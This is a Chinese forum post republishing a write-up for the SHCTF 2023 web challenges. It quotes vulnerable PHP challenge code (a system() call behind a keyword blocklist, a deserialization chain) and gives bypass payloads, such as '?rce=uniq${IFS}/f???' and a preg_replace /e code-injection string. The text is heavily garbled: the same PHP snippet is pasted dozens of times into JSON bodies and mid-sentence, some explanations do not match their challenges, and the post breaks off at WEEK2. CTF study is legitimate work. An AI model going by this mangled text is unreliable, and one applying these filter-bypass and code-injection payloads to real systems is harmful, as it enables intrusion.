2023 SHCTF-校外赛道 WEB WP

勿忘初心做自己  金牌会员 | 2023-11-26 11:17:06 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 960|帖子 960|积分 2880

WEEK1

babyRCE
  1. <?php
  3. $rce = $_GET['rce'];
  4. if (isset($rce)) {
  5.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  6.         system($rce);
  7.     }else {
  8.             echo "hhhhhhacker!!!"."\n";
  9.     }
  10. } else {
  11.     highlight_file(__FILE__);
  12. }
复制代码


一道较为基础的反序列化链子
文章推荐:php <?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
            echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}反序列化总结
  1. [/code][size=5]登录就给flag[/size]
  3. 点击登录,等待3秒,跳转到登录页面,尝试弱口令admin和password,登录成功
  4. [size=5][/size]
  6.  [img=565,78]https://img2023.cnblogs.com/blog/3167109/202310/3167109-20231030195707409-1980091191.png[/img]
  7. [size=5]飞机大战[/size]
  9. 查看源代码找到
  10. [img=395,83]https://img2023.cnblogs.com/blog/3167109/202310/3167109-20231030195915060-1866378878.png[/img]
  11. 进去找到一串编码
  12. [img=658,82]https://img2023.cnblogs.com/blog/3167109/202310/3167109-20231030200000266-1173510787.png[/img]
  13. 执行一下得到base64编码
  14. [code]?rce=uniq${IFS}/f???
复制代码
  1. flag{82c3aa08-6f04-48ab-abf3-99b9aaa1cd22}
复制代码
解码即可

ezphp
  1. <?php
  3. $rce = $_GET['rce'];
  4. if (isset($rce)) {
  5.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  6.         system($rce);
  7.     }else {
  8.             echo "hhhhhhacker!!!"."\n";
  9.     }
  10. } else {
  11.     highlight_file(__FILE__);
  12. }it <?php
  14. $rce = $_GET['rce'];
  15. if (isset($rce)) {
  16.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  17.         system($rce);
  18.     }else {
  19.             echo "hhhhhhacker!!!"."\n";
  20.     }
  21. } else {
  22.     highlight_file(__FILE__);
  23. }is <?php
  25. $rce = $_GET['rce'];
  26. if (isset($rce)) {
  27.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  28.         system($rce);
  29.     }else {
  30.             echo "hhhhhhacker!!!"."\n";
  31.     }
  32. } else {
  33.     highlight_file(__FILE__);
  34. }begin
复制代码


第一个过滤接收字符在判断之后,可以直接忽视

随后就是漏洞利用,这里是\e的命令执行
参考:深入研究preg_replace与代码执行
  1. ?code=${ <?php
  3. $rce = $_GET['rce'];
  4. if (isset($rce)) {
  5.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  6.         system($rce);
  7.     }else {
  8.             echo "hhhhhhacker!!!"."\n";
  9.     }
  10. } else {
  11.     highlight_file(__FILE__);
  12. }phpinfo() <?php
  14. $rce = $_GET['rce'];
  15. if (isset($rce)) {
  16.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  17.         system($rce);
  18.     }else {
  19.             echo "hhhhhhacker!!!"."\n";
  20.     }
  21. } else {
  22.     highlight_file(__FILE__);
  23. }}
复制代码
  1. <?php
  2. highlight_file(__FILE__);
  4. class A{
  5.   public $var_1;
  6.   
  7.   public function __invoke(){
  8.    include($this->var_1);
  9.   }
  10. }
  12. class B{
  13.   public $q;
  14.   public function __wakeup()
  15. {
  16.   if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->q)) {
  17.             echo "hacker";           
  18.         }
  19. }
  21. }
  22. class C{
  23.   public $var;
  24.   public $z;
  25.     public function __toString(){
  26.         return $this->z->var;
  27.     }
  28. }
  30. class D{
  31.   public $p;
  32.     public function __get($key){
  33.         $function = $this->p;
  34.         return $function();
  35.     }  
  36. }
  38. if(isset($_GET['payload']))
  39. {
  40.     unserialize($_GET['payload']);
  41. }
  42. ?>
复制代码
生成你的邀请函吧~
  1. API:url/print("\u005a\u006d\u0078\u0068\u005a\u0033\u0074\u006d\u0059\u007a\u004a\u0068\u004e\u006d\u0045\u0031\u005a\u0053\u0030\u0030\u004d\u0044\u0064\u0069\u004c\u0054\u0051\u0035\u0059\u0054\u0055\u0074\u004f\u0044\u0051\u0035\u004e\u0053\u0030\u0077\u0059\u007a\u0041\u0033\u004d\u007a\u005a\u006c\u004e\u0032\u0045\u007a\u005a\u006d\u0052\u0039\u000a") <?php
  3. $rce = $_GET['rce'];
  4. if (isset($rce)) {
  5.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  6.         system($rce);
  7.     }else {
  8.             echo "hhhhhhacker!!!"."\n";
  9.     }
  10. } else {
  11.     highlight_file(__FILE__);
  12. } <?php
  14. $rce = $_GET['rce'];
  15. if (isset($rce)) {
  16.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  17.         system($rce);
  18.     }else {
  19.             echo "hhhhhhacker!!!"."\n";
  20.     }
  21. } else {
  22.     highlight_file(__FILE__);
  23. }Request:POST <?php
  25. $rce = $_GET['rce'];
  26. if (isset($rce)) {
  27.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  28.         system($rce);
  29.     }else {
  30.             echo "hhhhhhacker!!!"."\n";
  31.     }
  32. } else {
  33.     highlight_file(__FILE__);
  34. }application/json <?php
  36. $rce = $_GET['rce'];
  37. if (isset($rce)) {
  38.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  39.         system($rce);
  40.     }else {
  41.             echo "hhhhhhacker!!!"."\n";
  42.     }
  43. } else {
  44.     highlight_file(__FILE__);
  45. } <?php
  47. $rce = $_GET['rce'];
  48. if (isset($rce)) {
  49.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  50.         system($rce);
  51.     }else {
  52.             echo "hhhhhhacker!!!"."\n";
  53.     }
  54. } else {
  55.     highlight_file(__FILE__);
  56. }Body:{ <?php
  58. $rce = $_GET['rce'];
  59. if (isset($rce)) {
  60.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  61.         system($rce);
  62.     }else {
  63.             echo "hhhhhhacker!!!"."\n";
  64.     }
  65. } else {
  66.     highlight_file(__FILE__);
  67. } <?php
  69. $rce = $_GET['rce'];
  70. if (isset($rce)) {
  71.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  72.         system($rce);
  73.     }else {
  74.             echo "hhhhhhacker!!!"."\n";
  75.     }
  76. } else {
  77.     highlight_file(__FILE__);
  78. } <?php
  80. $rce = $_GET['rce'];
  81. if (isset($rce)) {
  82.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  83.         system($rce);
  84.     }else {
  85.             echo "hhhhhhacker!!!"."\n";
  86.     }
  87. } else {
  88.     highlight_file(__FILE__);
  89. } <?php
  91. $rce = $_GET['rce'];
  92. if (isset($rce)) {
  93.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  94.         system($rce);
  95.     }else {
  96.             echo "hhhhhhacker!!!"."\n";
  97.     }
  98. } else {
  99.     highlight_file(__FILE__);
  100. } <?php
  102. $rce = $_GET['rce'];
  103. if (isset($rce)) {
  104.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  105.         system($rce);
  106.     }else {
  107.             echo "hhhhhhacker!!!"."\n";
  108.     }
  109. } else {
  110.     highlight_file(__FILE__);
  111. } <?php
  113. $rce = $_GET['rce'];
  114. if (isset($rce)) {
  115.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  116.         system($rce);
  117.     }else {
  118.             echo "hhhhhhacker!!!"."\n";
  119.     }
  120. } else {
  121.     highlight_file(__FILE__);
  122. }"name": <?php
  124. $rce = $_GET['rce'];
  125. if (isset($rce)) {
  126.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  127.         system($rce);
  128.     }else {
  129.             echo "hhhhhhacker!!!"."\n";
  130.     }
  131. } else {
  132.     highlight_file(__FILE__);
  133. }"Yourname", <?php
  135. $rce = $_GET['rce'];
  136. if (isset($rce)) {
  137.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  138.         system($rce);
  139.     }else {
  140.             echo "hhhhhhacker!!!"."\n";
  141.     }
  142. } else {
  143.     highlight_file(__FILE__);
  144. } <?php
  146. $rce = $_GET['rce'];
  147. if (isset($rce)) {
  148.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  149.         system($rce);
  150.     }else {
  151.             echo "hhhhhhacker!!!"."\n";
  152.     }
  153. } else {
  154.     highlight_file(__FILE__);
  155. } <?php
  157. $rce = $_GET['rce'];
  158. if (isset($rce)) {
  159.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  160.         system($rce);
  161.     }else {
  162.             echo "hhhhhhacker!!!"."\n";
  163.     }
  164. } else {
  165.     highlight_file(__FILE__);
  166. } <?php
  168. $rce = $_GET['rce'];
  169. if (isset($rce)) {
  170.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  171.         system($rce);
  172.     }else {
  173.             echo "hhhhhhacker!!!"."\n";
  174.     }
  175. } else {
  176.     highlight_file(__FILE__);
  177. } <?php
  179. $rce = $_GET['rce'];
  180. if (isset($rce)) {
  181.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  182.         system($rce);
  183.     }else {
  184.             echo "hhhhhhacker!!!"."\n";
  185.     }
  186. } else {
  187.     highlight_file(__FILE__);
  188. } <?php
  190. $rce = $_GET['rce'];
  191. if (isset($rce)) {
  192.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  193.         system($rce);
  194.     }else {
  195.             echo "hhhhhhacker!!!"."\n";
  196.     }
  197. } else {
  198.     highlight_file(__FILE__);
  199. }"imgurl": <?php
  201. $rce = $_GET['rce'];
  202. if (isset($rce)) {
  203.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  204.         system($rce);
  205.     }else {
  206.             echo "hhhhhhacker!!!"."\n";
  207.     }
  208. } else {
  209.     highlight_file(__FILE__);
  210. }"http://q.qlogo.cn/headimg_dl?dst_uin=QQnumb&spec=640&img_type=jpg" <?php
  212. $rce = $_GET['rce'];
  213. if (isset($rce)) {
  214.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  215.         system($rce);
  216.     }else {
  217.             echo "hhhhhhacker!!!"."\n";
  218.     }
  219. } else {
  220.     highlight_file(__FILE__);
  221. } <?php
  223. $rce = $_GET['rce'];
  224. if (isset($rce)) {
  225.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  226.         system($rce);
  227.     }else {
  228.             echo "hhhhhhacker!!!"."\n";
  229.     }
  230. } else {
  231.     highlight_file(__FILE__);
  232. }} <?php
  234. $rce = $_GET['rce'];
  235. if (isset($rce)) {
  236.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  237.         system($rce);
  238.     }else {
  239.             echo "hhhhhhacker!!!"."\n";
  240.     }
  241. } else {
  242.     highlight_file(__FILE__);
  243. } <?php
  245. $rce = $_GET['rce'];
  246. if (isset($rce)) {
  247.     if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
  248.         system($rce);
  249.     }else {
  250.             echo "hhhhhhacker!!!"."\n";
  251.     }
  252. } else {
  253.     highlight_file(__FILE__);
  254. }
复制代码


使用POST <?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
            echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}json请求来生成你的邀请函吧~flag就在里面哦~
postman向
  1. print("\u005a\u006d\u0078\u0068\u005a\u0033\u0074\u006d\u0059\u007a\u004a\u0068\u004e\u006d\u0045\u0031\u005a\u0053\u0030\u0030\u004d\u0044\u0064\u0069\u004c\u0054\u0051\u0035\u0059\u0054\u0055\u0074\u004f\u0044\u0051\u0035\u004e\u0053\u0030\u0077\u0059\u007a\u0041\u0033\u004d\u007a\u005a\u006c\u004e\u0032\u0045\u007a\u005a\u006d\u0052\u0039\u000a")
复制代码
发包即可

WEEK2

no_wake_up

[code]
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

勿忘初心做自己

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

存储 挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表